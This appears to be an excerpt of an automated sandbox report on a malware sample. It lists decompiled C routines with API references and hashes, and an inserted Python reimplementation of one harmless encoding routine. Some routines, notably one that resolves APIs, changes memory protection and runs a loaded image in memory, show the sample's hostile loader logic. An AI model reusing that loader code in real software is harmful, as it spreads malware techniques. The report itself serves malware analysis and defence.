                            • Associated: 00000000.00000002.505825870.00000000006DC000.00000002.10000000.00040000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_main.jbxd
                            Similarity
                            • API ID: CountCreateHeapTick
                            • String ID:
                            • API String ID: 2177101570-0
                            • Opcode ID: 7d1db19f4d928e0898461d60eacee308bf38ebc973a3d9d3fcc6575824da5ac1
                            • Instruction ID: 6fe216fad6e4a51da03393459a5e82023711b962921029ca6a1aaa13715ba10c
                            • Opcode Fuzzy Hash: 7d1db19f4d928e0898461d60eacee308bf38ebc973a3d9d3fcc6575824da5ac1
                            • Instruction Fuzzy Hash: BEF06D30D0C342AADB602FB1AC06B1937976F24745F11582BFC01D43A2FBB1C800A62B
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 92%
                            			// Serialises __eax bytes at _a4 as comma-separated decimal text (e.g. "192,168,0,1").
                            			// Allocates 4 bytes per input byte from the heap at 0x6da2d8 (worst case "255," is four
                            			// characters) and stores the buffer in *_a8. Per byte: the hundreds digit is emitted if
                            			// non-zero, the tens digit if non-zero or if a hundreds digit preceded it, then the units
                            			// digit and a ','. The constants 0x9c and 0xf6 are -100 and -10 modulo 256, i.e. 8-bit
                            			// subtraction of the digit just emitted. The final ',' is overwritten with NUL and the string
                            			// length (without NUL) stored in *_a12. Returns 0 on success, 8 (ERROR_NOT_ENOUGH_MEMORY)
                            			// if allocation fails. The do/while body runs at least once, so __eax == 0 is not handled.
                            			E006D1FB6(signed int __eax, void* __ecx, intOrPtr* _a4, void** _a8, intOrPtr* _a12) {
                            				signed int _v5;
                            				signed int _v12;
                            				void* _t32;
                            				signed int _t37;
                            				signed int _t39;
                            				signed char _t45;
                            				void* _t49;
                            				char* _t51;
                            				signed int _t65;
                            				signed int _t66;
                            				signed int _t69;
                            
                            				_v12 = _v12 & 0x00000000;
                            				_t69 = __eax; // byte count
                            				_t32 = RtlAllocateHeap( *0x6da2d8, 0, __eax << 2); // executed  -- 4 bytes per input byte
                            				_t49 = _t32;
                            				if(_t49 == 0) {
                            					_v12 = 8;
                            				} else {
                            					 *_a8 = _t49;
                            					do {
                            						_t45 =  *_a4;
                            						asm("cdq");
                            						_t65 = 0x64;
                            						_t37 = (_t45 & 0x000000ff) / _t65; // hundreds digit
                            						_v5 = _t37;
                            						if(_t37 != 0) {
                            							 *_t49 = _t37 + 0x30;
                            							_t49 = _t49 + 1;
                            							_t45 = _t45 + _t37 * 0x9c; // subtract 100 * hundreds (mod 256)
                            						}
                            						asm("cdq");
                            						_t66 = 0xa;
                            						_t39 = (_t45 & 0x000000ff) / _t66; // tens digit
                            						if(_t39 != 0 || _v5 != _t39) { // emit tens digit if non-zero or a hundreds digit was written
                            							 *_t49 = _t39 + 0x30;
                            							_t49 = _t49 + 1;
                            							_t45 = _t45 + _t39 * 0xf6; // subtract 10 * tens (mod 256)
                            						}
                            						_a4 = _a4 + 1;
                            						 *_t49 = _t45 + 0x30; // units digit
                            						 *(_t49 + 1) = 0x2c; // ','
                            						_t49 = _t49 + 2;
                            						_t69 = _t69 - 1;
                            					} while (_t69 != 0);
                            					_t51 = _t49 - 1; // position of the trailing ','
                            					 *_a12 = _t51 -  *_a8; // string length without NUL
                            					 *_t51 = 0;
                            				}
                            				return _v12;
                            			}

                            Disassembly listing (address column only, instruction text not captured in this export): 0x006d1fbb to 0x006d2055

                            APIs
                            • RtlAllocateHeap.NTDLL(00000000,00000000,?), ref: 006D1FCE
                            Memory Dump Source
                            • Source File: 00000000.00000002.505745541.00000000006D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 00000000.00000002.505731585.00000000006D0000.00000004.10000000.00040000.00000000.sdmp
                            • Associated: 00000000.00000002.505786460.00000000006D9000.00000002.10000000.00040000.00000000.sdmp
                            • Associated: 00000000.00000002.505804953.00000000006DA000.00000004.10000000.00040000.00000000.sdmp
                            • Associated: 00000000.00000002.505825870.00000000006DC000.00000002.10000000.00040000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_main.jbxd
                            Similarity
                            • API ID: AllocateHeap
                            • String ID:
                            • API String ID: 1279760036-0
                            • Opcode ID: 7835fe3d7aa98434f771233ebccacaf737ee15b70200524375abcfd4e5a38785
                            • Instruction ID: 66277946c06d350b62f8de881166d7952d10bedf864d55fd62e31669fd5ce8b2
                            • Opcode Fuzzy Hash: 7835fe3d7aa98434f771233ebccacaf737ee15b70200524375abcfd4e5a38785
                            • Instruction Fuzzy Hash: 1E11E971645345AFEB168F2AD851BE97BA6DF67318F14508FE4408F392C277890BC760
                            Uniqueness

                            Uniqueness Score: -1.00%
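The routine E006D1FB6 above turns a byte array into comma-separated decimal text. The Python below is an added example, not code from the sample or from Joe Sandbox: it mirrors the decompiled arithmetic (the 8-bit -100/-10 constants and the digit-emission conditions) and checks it against the obvious reference for every byte value, which is how an analyst confirms a reading of decompiled output before building tooling on it. The decoder, the 4-bytes-per-input allocation check and all function names are the editor's own.

```python
"""Mirror of the decompiled routine E006D1FB6 (byte array -> "a,b,c" decimal text).

Added example: reimplements the decompiler output step for step so its behaviour
can be checked against a reference; it is not the sample's own code.
"""


def buffer_size(n: int) -> int:
    """Allocation the routine makes: n << 2, i.e. 4 bytes per input byte ("255," is 4 chars)."""
    return n << 2


def encode_decimal_csv(data: bytes) -> str:
    """Each byte becomes its decimal ASCII form, entries joined by ','.

    The original overwrites the trailing ',' with NUL and reports the length;
    here the trailing ',' is simply dropped.
    """
    if not data:
        # The original is a do/while loop with no length check, so n == 0 would
        # underflow its counter; reject that input instead of mirroring the bug.
        raise ValueError("empty input")
    out = bytearray()
    for b in data:
        v = b
        hundreds = v // 100                      # _t37 = (al & 0xff) / 0x64
        if hundreds:
            out.append(0x30 + hundreds)
            v = (v + hundreds * 0x9C) & 0xFF     # 0x9c == -100 mod 256: v -= 100 * hundreds
        tens = v // 10                           # _t39 = (al & 0xff) / 0xa
        if tens != 0 or hundreds != tens:        # original: _t39 != 0 || _v5 != _t39
            out.append(0x30 + tens)
            v = (v + tens * 0xF6) & 0xFF         # 0xf6 == -10 mod 256: v -= 10 * tens
        out.append(0x30 + v)                     # units digit
        out.append(0x2C)                         # ','
    del out[-1]                                  # trailing ',' (NUL in the original)
    return out.decode("ascii")


def decode_decimal_csv(text: str) -> bytes:
    """Inverse: parse 'a,b,c' back to bytes, rejecting anything the encoder cannot produce."""
    vals = []
    for tok in text.split(","):
        if not tok.isdigit() or len(tok) > 3 or (len(tok) > 1 and tok[0] == "0"):
            raise ValueError(f"bad token {tok!r}")
        v = int(tok)
        if v > 255:
            raise ValueError(f"out of range: {v}")
        vals.append(v)
    return bytes(vals)


def reference(data: bytes) -> str:
    """The straightforward formulation the decompiled arithmetic should be equivalent to."""
    return ",".join(str(b) for b in data)


def check_equivalence() -> bool:
    """True if the mirrored arithmetic matches the reference for every byte value,
    the 4*n allocation always holds the text plus its NUL, and decoding round-trips."""
    all_bytes = bytes(range(256))
    if encode_decimal_csv(all_bytes) != reference(all_bytes):
        return False
    for b in range(256):
        s = encode_decimal_csv(bytes([b]))
        if s != str(b) or len(s) + 1 > buffer_size(1):
            return False
    return decode_decimal_csv(encode_decimal_csv(all_bytes)) == all_bytes


if __name__ == "__main__":
    sample = bytes([192, 168, 0, 1])             # constructed input
    print(encode_decimal_csv(sample))
    print("equivalent to reference:", check_equivalence())
```

Running the module prints `192,168,0,1` and confirms the equivalence check; once that holds, the simpler `",".join(str(b) ...)` form can stand in for the routine in any parser or emulator of the sample's data format.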

                            C-Code - Quality: 100%
                            			E006D5D05(signed int* __ecx, intOrPtr _a4, signed int* _a8, signed int* _a12) {
                            				intOrPtr _v12;
                            				signed int _v20;
                            				intOrPtr _v24;
                            				signed int _v60;
                            				char _v68;
                            				void* __ebx;
                            				void* __edi;
                            				void* __esi;
                            				intOrPtr _t14;
                            				signed int* _t16;
                            				signed int _t25;
                            				signed int _t26;
                            				signed int* _t28;
                            				signed int _t30;
                            
                            				_t28 = __ecx;
                            				_t14 =  *0x6da368; // 0x14a9668
                            				_v12 = _t14;
                            				_t16 = _a12;
                            				_t30 = 8;
                            				if(_t16 != 0) {
                            					 *_t16 =  *_t16 & 0x00000000;
                            				}
                            				do {
                            					_t31 =  &_v68;
                            					if(E006D7571( &_v68) == 0) {
                            						goto L16;
                            					}
                            					_t30 = E006D2C73(_t31, _a4, _v12);
                            					if(_t30 == 0) {
                            						_t25 = E006D4F4B(_t31, _t28); // executed
                            						_t30 = _t25;
                            						if(_t30 != 0) {
                            							if(_t30 == 0x102) {
                            								E006DA000 = E006DA000 + 0xea60;
                            							}
                            						} else {
                            							if(_v24 != 0xc8) {
                            								_t30 = 0xe8;
                            							} else {
                            								_t26 = _v20;
                            								if(_t26 == 0) {
                            									_t30 = 0x10d2;
                            								} else {
                            									_t28 = _a8;
                            									if(_t28 != 0) {
                            										_v60 = _v60 & _t30;
                            										 *_t28 = _v60;
                            										_t28 = _a12;
                            										if(_t28 != 0) {
                            											 *_t28 = _t26;
                            										}
                            									}
                            								}
                            							}
                            						}
                            					}
                            					E006D70E7( &_v68, 0x102, _t28, _t30);
                            					L16:
                            				} while (_t30 == 0x2f19 && WaitForSingleObject( *0x6da30c, 0) == 0x102);
                            				return _t30;
                            			}

                            APIs
                            • WaitForSingleObject.KERNEL32(00000000,74CF81D0,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 006D5DB7
                            Memory Dump Source
                            • Source File: 00000000.00000002.505745541.00000000006D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 00000000.00000002.505731585.00000000006D0000.00000004.10000000.00040000.00000000.sdmp
                            • Associated: 00000000.00000002.505786460.00000000006D9000.00000002.10000000.00040000.00000000.sdmp
                            • Associated: 00000000.00000002.505804953.00000000006DA000.00000004.10000000.00040000.00000000.sdmp
                            • Associated: 00000000.00000002.505825870.00000000006DC000.00000002.10000000.00040000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_main.jbxd
                            Similarity
                            • API ID: ObjectSingleWait
                            • String ID:
                            • API String ID: 24740636-0
                            • Opcode ID: e2c1413b1a0b14c287a5664b34fb504008110c682fb405e35af80f4e2752c817
                            • Instruction ID: 6af75ed4678e1ef0c142f6f8161bbf17c95d29a7af965b667151f8440c9524ef
                            • Opcode Fuzzy Hash: e2c1413b1a0b14c287a5664b34fb504008110c682fb405e35af80f4e2752c817
                            • Instruction Fuzzy Hash: B9218E31F01A069BDB129F59D858BAE37A7AF94350F14442BE4039B790DB70DC428B69
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 34%
                            			E006D5BB5(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
                            				intOrPtr _v12;
                            				void* _v18;
                            				char _v20;
                            				intOrPtr _t15;
                            				void* _t17;
                            				intOrPtr _t19;
                            				void* _t23;
                            
                            				_v20 = 0;
                            				asm("stosd");
                            				asm("stosd");
                            				asm("stosd");
                            				asm("stosw");
                            				_t15 =  *0x6da348; // 0xdcd5a8
                            				_t4 = _t15 + 0x6db3a0; // 0x14a8948
                            				_t20 = _t4;
                            				_t6 = _t15 + 0x6db124; // 0x650047
                            				_t17 = E006D4BD5(_t4, _a4, 0x80000002, _a8, _t6, _a12, _t4,  &_v20); // executed
                            				if(_t17 < 0) {
                            					_t23 = _t17;
                            				} else {
                            					_t23 = 8;
                            					if(_v20 != _t23) {
                            						_t23 = 1;
                            					} else {
                            						_t19 = E006D1D63(_t20, _v12);
                            						if(_t19 != 0) {
                            							 *_a16 = _t19;
                            							_t23 = 0;
                            						}
                            						__imp__#6(_v12);
                            					}
                            				}
                            				return _t23;
                            			}

                            APIs
                              • Part of subcall function 006D4BD5: SysFreeString.OLEAUT32(?), ref: 006D4CB4
                              • Part of subcall function 006D1D63: lstrlenW.KERNEL32(004F0053,00000000,00000000,?,?,006D6189,004F0053,00000000,?), ref: 006D1D6C
                              • Part of subcall function 006D1D63: memcpy.NTDLL(00000000,004F0053,?,?,00000002,?,?,006D6189,004F0053,00000000,?), ref: 006D1D96
                              • Part of subcall function 006D1D63: memset.NTDLL ref: 006D1DAA
                            • SysFreeString.OLEAUT32(00000000), ref: 006D5C18
                            Memory Dump Source
                            • Source File: 00000000.00000002.505745541.00000000006D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 00000000.00000002.505731585.00000000006D0000.00000004.10000000.00040000.00000000.sdmp
                            • Associated: 00000000.00000002.505786460.00000000006D9000.00000002.10000000.00040000.00000000.sdmp
                            • Associated: 00000000.00000002.505804953.00000000006DA000.00000004.10000000.00040000.00000000.sdmp
                            • Associated: 00000000.00000002.505825870.00000000006DC000.00000002.10000000.00040000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_main.jbxd
                            Similarity
                            • API ID: FreeString$lstrlenmemcpymemset
                            • String ID:
                            • API String ID: 397948122-0
                            • Opcode ID: 41c7d88525b14727aa9152028ffa4d68febb9e5b6ab9c17acbb5b99ea7bc0c1b
                            • Instruction ID: dfa0ebbcd2148faeaa4e197060fa89d01f3a633c0b2b6b6b997ff70518931896
                            • Opcode Fuzzy Hash: 41c7d88525b14727aa9152028ffa4d68febb9e5b6ab9c17acbb5b99ea7bc0c1b
                            • Instruction Fuzzy Hash: D2017131910619BFDB619FA8CC05EAABBBAFB08750F01546AF906E7260E7709911CB90
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 89%
                            			E006D5DD4(signed int __eax, void* __ecx, intOrPtr* __esi, void* _a4) {
                            				char _v8;
                            				void* _t14;
                            				intOrPtr _t17;
                            				void* _t20;
                            				void* _t26;
                            
                            				_push(__ecx);
                            				if(_a4 == 0 || __eax == 0) {
                            					_t26 = 0x57;
                            				} else {
                            					_t14 = E006D1FB6(__eax,  &_a4, _a4,  &_a4,  &_v8); // executed
                            					_t26 = _t14;
                            					if(_t26 == 0) {
                            						_t17 =  *0x6da348; // 0xdcd5a8
                            						_t9 = _t17 + 0x6dba32; // 0x444f4340
                            						_t20 = E006D69D2( *((intOrPtr*)(__esi + 4)),  *__esi, _t9, _a4, _v8, __esi + 8, __esi + 0xc); // executed
                            						_t26 = _t20;
                            						RtlFreeHeap( *0x6da2d8, 0, _a4); // executed
                            					}
                            				}
                            				return _t26;
                            			}

                            APIs
                              • Part of subcall function 006D1FB6: RtlAllocateHeap.NTDLL(00000000,00000000,?), ref: 006D1FCE
                              • Part of subcall function 006D69D2: lstrlen.KERNEL32(74D0F710,?,00000000,?,74D0F710), ref: 006D6A06
                              • Part of subcall function 006D69D2: StrStrA.SHLWAPI(00000000,?), ref: 006D6A13
                              • Part of subcall function 006D69D2: RtlAllocateHeap.NTDLL(00000000,?), ref: 006D6A32
                            • RtlFreeHeap.NTDLL(00000000,00000000,?,444F4340,00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,006D6495), ref: 006D5E2A
                            Memory Dump Source
                            • Source File: 00000000.00000002.505745541.00000000006D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 00000000.00000002.505731585.00000000006D0000.00000004.10000000.00040000.00000000.sdmp
                            • Associated: 00000000.00000002.505786460.00000000006D9000.00000002.10000000.00040000.00000000.sdmp
                            • Associated: 00000000.00000002.505804953.00000000006DA000.00000004.10000000.00040000.00000000.sdmp
                            • Associated: 00000000.00000002.505825870.00000000006DC000.00000002.10000000.00040000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_main.jbxd
                            Similarity
                            • API ID: Heap$Allocate$Freelstrlen
                            • String ID:
                            • API String ID: 2220322926-0
                            • Opcode ID: 697707fb3881c72abbb8f58a07b854f2018617a1a6a1908b3d3989da30f37b91
                            • Instruction ID: e60bf546ee90243e7b7fcfde3f8a48bf4b73d7f702c431e0e21d696a618bb28e
                            • Opcode Fuzzy Hash: 697707fb3881c72abbb8f58a07b854f2018617a1a6a1908b3d3989da30f37b91
                            • Instruction Fuzzy Hash: 7E016936500609FFDB11DF44DC00EAA7BAAEB84350F14402BFA4686770EB71EE45DBA0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 37%
                            			E00401329(void* __eax, intOrPtr _a4) {
                            
                            				 *0x403190 =  *0x403190 & 0x00000000;
                            				_push(0);
                            				_push(0x40318c);
                            				_push(1);
                            				_push(_a4);
                            				 *0x403188 = 0xc; // executed
                            				L00401814(); // executed
                            				return __eax;
                            			}

                            APIs
                            • ConvertStringSecurityDescriptorToSecurityDescriptorA.ADVAPI32(00401223,00000001,0040318C,00000000), ref: 00401347
                            Memory Dump Source
                            • Source File: 00000000.00000002.505462084.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.505438679.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.505483863.0000000000402000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.505504174.0000000000404000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.505525978.0000000000406000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_main.jbxd
                            Similarity
                            • API ID: DescriptorSecurity$ConvertString
                            • String ID:
                            • API String ID: 3907675253-0
                            • Opcode ID: 2ed8448a664af8dbfd4061e7b4b6ea82259f6e1c2e9b0ef4b3f051abbd3d4665
                            • Instruction ID: 0a6ed26458322d25cf41c4398ef33c21c70633b53ff5094838ea71f747521604
                            • Opcode Fuzzy Hash: 2ed8448a664af8dbfd4061e7b4b6ea82259f6e1c2e9b0ef4b3f051abbd3d4665
                            • Instruction Fuzzy Hash: 6FC04C75150300B6E610AF009D46F457E597758B0AF60452EB644391E1C3F95254952D
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 100%
                            			E006D7A71(long _a4) {
                            				void* _t2;
                            
                            				_t2 = RtlAllocateHeap( *0x6da2d8, 0, _a4); // executed
                            				return _t2;
                            			}

                            APIs
                            • RtlAllocateHeap.NTDLL(00000000,00000000,006D4DB1), ref: 006D7A7D
                            Memory Dump Source
                            • Source File: 00000000.00000002.505745541.00000000006D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 00000000.00000002.505731585.00000000006D0000.00000004.10000000.00040000.00000000.sdmp
                            • Associated: 00000000.00000002.505786460.00000000006D9000.00000002.10000000.00040000.00000000.sdmp
                            • Associated: 00000000.00000002.505804953.00000000006DA000.00000004.10000000.00040000.00000000.sdmp
                            • Associated: 00000000.00000002.505825870.00000000006DC000.00000002.10000000.00040000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_main.jbxd
                            Similarity
                            • API ID: AllocateHeap
                            • String ID:
                            • API String ID: 1279760036-0
                            • Opcode ID: b4286ad689b88173ec9b504bd5c2f88a1e9c5d477467d16ba3a2d774bdd7ede1
                            • Instruction ID: 7ef4f12f29f139dd4b2ca3c0bf4cf01d7e0a468967b71ee291d4cb28c47decba
                            • Opcode Fuzzy Hash: b4286ad689b88173ec9b504bd5c2f88a1e9c5d477467d16ba3a2d774bdd7ede1
                            • Instruction Fuzzy Hash: ABB01231805200ABCF014F41ED08F057B23BB90700F045016B2084007082330460FB15
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 100%
                            			E006D789E(void* _a4) {
                            				char _t2;
                            
                            				_t2 = RtlFreeHeap( *0x6da2d8, 0, _a4); // executed
                            				return _t2;
                            			}

                            APIs
                            • RtlFreeHeap.NTDLL(00000000,00000000,006D4E3E,00000000,?,00000000,00000000), ref: 006D78AA
                            Memory Dump Source
                            • Source File: 00000000.00000002.505745541.00000000006D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 00000000.00000002.505731585.00000000006D0000.00000004.10000000.00040000.00000000.sdmp
                            • Associated: 00000000.00000002.505786460.00000000006D9000.00000002.10000000.00040000.00000000.sdmp
                            • Associated: 00000000.00000002.505804953.00000000006DA000.00000004.10000000.00040000.00000000.sdmp
                            • Associated: 00000000.00000002.505825870.00000000006DC000.00000002.10000000.00040000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_main.jbxd
                            Similarity
                            • API ID: FreeHeap
                            • String ID:
                            • API String ID: 3298025750-0
                            • Opcode ID: e623d4fec31179a6e1130e715d277ed8341ac305ae4327c2eb9a2757db44d4fa
                            • Instruction ID: 92c5a42fb097f584031974594afd14f48736f79ba165bbac8a1f45b74abf6747
                            • Opcode Fuzzy Hash: e623d4fec31179a6e1130e715d277ed8341ac305ae4327c2eb9a2757db44d4fa
                            • Instruction Fuzzy Hash: 57B01271905200ABCF114B41EE04F057B23AB90700F045016B3045007482320420FB26
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 100%
                            			E006D1DBC(intOrPtr* __eax, void* __ecx, void* __edx, void* _a4, void** _a8) {
                            				void* _v8;
                            				int _v12;
                            				char _v16;
                            				intOrPtr _v20;
                            				intOrPtr _v24;
                            				intOrPtr _v28;
                            				char _v32;
                            				char _v144;
                            				int _v148;
                            				intOrPtr _v152;
                            				intOrPtr _v156;
                            				intOrPtr _v160;
                            				char _v164;
                            				void* _t37;
                            				void* _t42;
                            				void* _t51;
                            				int _t53;
                            				void* _t60;
                            				void* _t63;
                            				void* _t64;
                            
                            				_t53 = 0;
                            				_t60 = __ecx;
                            				_v16 = 0;
                            				_v12 = 0;
                            				_v8 = 0;
                            				if(__ecx <= 0x80 ||  *__eax != 0x400) {
                            					L21:
                            					return _t53;
                            				} else {
                            					_t58 =  &_v164;
                            					_t37 = E006D6356(__eax, __edx,  &_v164,  &_v16, _a4 + __ecx - 0x80);
                            					if(_t37 != 0) {
                            						goto L21;
                            					}
                            					_t61 = _t60 - 0x80;
                            					if(_v148 > _t60 - 0x80) {
                            						goto L21;
                            					}
                            					while( *((intOrPtr*)(_t64 + _t37 - 0x8c)) == _t53) {
                            						_t37 = _t37 + 1;
                            						if(_t37 < 0x10) {
                            							continue;
                            						}
                            						_t53 = _v148;
                            						_t51 = E006D7A71(_t53);
                            						_v8 = _t51;
                            						_t73 = _t51;
                            						if(_t51 != 0) {
                            							_t53 = 0;
                            							L18:
                            							if(_t53 != 0) {
                            								goto L21;
                            							}
                            							L19:
                            							if(_v8 != 0) {
                            								E006D789E(_v8);
                            							}
                            							goto L21;
                            						}
                            						memcpy(_t51, _a4, _t53);
                            						L8:
                            						_t63 = _v8;
                            						E006D70A6(_t58, _t73, _t63, _t53,  &_v32);
                            						if(_v32 != _v164 || _v28 != _v160 || _v24 != _v156 || _v20 != _v152) {
                            							L15:
                            							_t53 = 0;
                            							goto L19;
                            						} else {
                            							 *_a8 = _t63;
                            							goto L18;
                            						}
                            					}
                            					_t58 =  &_v144;
                            					_t42 = E006D47E5(_t61 & 0xfffffff0, 0,  &_v144, _a4,  &_v8,  &_v12); // executed
                            					__eflags = _t42;
                            					if(_t42 != 0) {
                            						_t53 = _v12;
                            						goto L18;
                            					}
                            					_t53 = _v148;
                            					__eflags = _v12 - _t53;
                            					if(__eflags >= 0) {
                            						goto L8;
                            					}
                            					goto L15;
                            				}
                            			}

                            APIs
                            • memcpy.NTDLL(00000000,?,?,?,?,?,00000001,?,?,?), ref: 006D1E43
                            Memory Dump Source
                            • Source File: 00000000.00000002.505745541.00000000006D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 00000000.00000002.505731585.00000000006D0000.00000004.10000000.00040000.00000000.sdmp
                            • Associated: 00000000.00000002.505786460.00000000006D9000.00000002.10000000.00040000.00000000.sdmp
                            • Associated: 00000000.00000002.505804953.00000000006DA000.00000004.10000000.00040000.00000000.sdmp
                            • Associated: 00000000.00000002.505825870.00000000006DC000.00000002.10000000.00040000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_main.jbxd
                            Similarity
                            • API ID: memcpy
                            • String ID:
                            • API String ID: 3510742995-0
                            • Opcode ID: 5e406ea88fbe36327240fc74ccace8f3231dda3a7aab06252878a88bad6d2202
                            • Instruction ID: 0ebdb453a4704ef71ccb0d6a953de6fe6c2922c0ed30c7076b6d9c9079742b34
                            • Opcode Fuzzy Hash: 5e406ea88fbe36327240fc74ccace8f3231dda3a7aab06252878a88bad6d2202
                            • Instruction Fuzzy Hash: 35311E71D00219FFDF11DE95C980AEDB7BABB56304F1041ABE905AB341E7709E858B60
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 86%
                            			E00401875(void* __eax) {
                            				char _v8;
                            				void* _v12;
                            				void* __edi;
                            				void* _t18;
                            				long _t24;
                            				long _t26;
                            				long _t29;
                            				intOrPtr _t40;
                            				void* _t41;
                            				intOrPtr* _t42;
                            				void* _t44;
                            
                            				_t41 = __eax; /* 0x0040187d */
                            				_t16 =  *0x403180; /* 0x0040187f */
                            				_t33 =  *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0x403180 - 0x69b24f45 &  !( *0x403180 - 0x69b24f45); /* 0x0040189b */
                            				_t18 = E00401B39( *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0x403180 - 0x69b24f45 &  !( *0x403180 - 0x69b24f45),  *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0x403180 - 0x69b24f45 &  !( *0x403180 - 0x69b24f45), _t16 + 0x964da0fc,  &_v8,  &_v12); /* 0x004018ac */ // executed
                            				if(_t18 != 0) { /* 0x004018b3 */
                            					_t29 = 8; /* 0x00401911 */
                            					goto L8; /* 0x00000000 */
                            				} else { /* 0x004018b5 */
                            					_t40 = _v8; /* 0x004018b5 */
                            					_t29 = E00401C1D(_t33, _t40, _t41); /* 0x004018bf */
                            					if(_t29 == 0) { /* 0x004018c3 */
                            						_t44 =  *((intOrPtr*)(_t40 + 0x3c)) + _t40; /* 0x004018c8 */
                            						_t24 = E0040134F(_t40, _t44); /* 0x004018cb */ // executed
                            						_t29 = _t24; /* 0x004018d0 */
                            						if(_t29 == 0) { /* 0x004018d4 */
                            							_t26 = E00401E3D(_t44, _t40); /* 0x004018d9 */ // executed
                            							_t29 = _t26; /* 0x004018de */
                            							if(_t29 == 0) { /* 0x004018e2 */
                            								_push(_t26); /* 0x004018e7 */
                            								_push(1); /* 0x004018e8 */
                            								_push(_t40); /* 0x004018ec */
                            								if( *((intOrPtr*)( *((intOrPtr*)(_t44 + 0x28)) + _t40))() == 0) { /* 0x004018f1 */
                            									_t29 = GetLastError(); /* 0x004018f9 */
                            								} /* 0x004018f9 */
                            							} /* 0x004018f1 */
                            						} /* 0x004018e2 */
                            					} /* 0x004018d4 */
                            					_t42 = _v12; /* 0x004018fb */
                            					 *((intOrPtr*)(_t42 + 0x18))( *((intOrPtr*)(_t42 + 0x1c))( *_t42)); /* 0x00401904 */
                            					E0040147E(_t42); /* 0x00401908 */
                            					L8: /* 0x00401912 */
                            					return _t29; /* 0x00401918 */
                            				} /* 0x00401918 */
                            			}

                            APIs
                              • Part of subcall function 00401B39: GetModuleHandleA.KERNEL32(?,00000020,?,?,?,?,?,004018B1,?,?,?,?,?,00000002,?,?), ref: 00401B5D
                              • Part of subcall function 00401B39: GetProcAddress.KERNEL32(00000000,?), ref: 00401B7F
                              • Part of subcall function 00401B39: GetProcAddress.KERNEL32(00000000,?), ref: 00401B95
                              • Part of subcall function 00401B39: GetProcAddress.KERNEL32(00000000,?), ref: 00401BAB
                              • Part of subcall function 00401B39: GetProcAddress.KERNEL32(00000000,?), ref: 00401BC1
                              • Part of subcall function 00401B39: GetProcAddress.KERNEL32(00000000,?), ref: 00401BD7
                              • Part of subcall function 0040134F: LoadLibraryA.KERNELBASE(?,?,00000000,?,?), ref: 00401387
                              • Part of subcall function 00401E3D: VirtualProtect.KERNELBASE(00000000,?,?,?,?,?,00000000,?,?), ref: 00401E76
                              • Part of subcall function 00401E3D: VirtualProtect.KERNELBASE(00000000,?,?,?), ref: 00401EEB
                              • Part of subcall function 00401E3D: GetLastError.KERNEL32 ref: 00401EF1
                            • GetLastError.KERNEL32(?,?), ref: 004018F3
                            Memory Dump Source
                            • Source File: 00000000.00000002.505462084.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.505438679.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.505483863.0000000000402000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.505504174.0000000000404000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.505525978.0000000000406000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_main.jbxd
                            Similarity
                            • API ID: AddressProc$ErrorLastProtectVirtual$HandleLibraryLoadModule
                            • String ID:
                            • API String ID: 3135819546-0
                            • Opcode ID: 55e36e603ecf1f375935bfc2b6faf8baf07d13715f36cfb61c3d334d7de0f626
                            • Instruction ID: 2a630c9bca26b312d1a6089272dc605b797118c6fb065e3c503f4e5450e97ac4
                            • Opcode Fuzzy Hash: 55e36e603ecf1f375935bfc2b6faf8baf07d13715f36cfb61c3d334d7de0f626
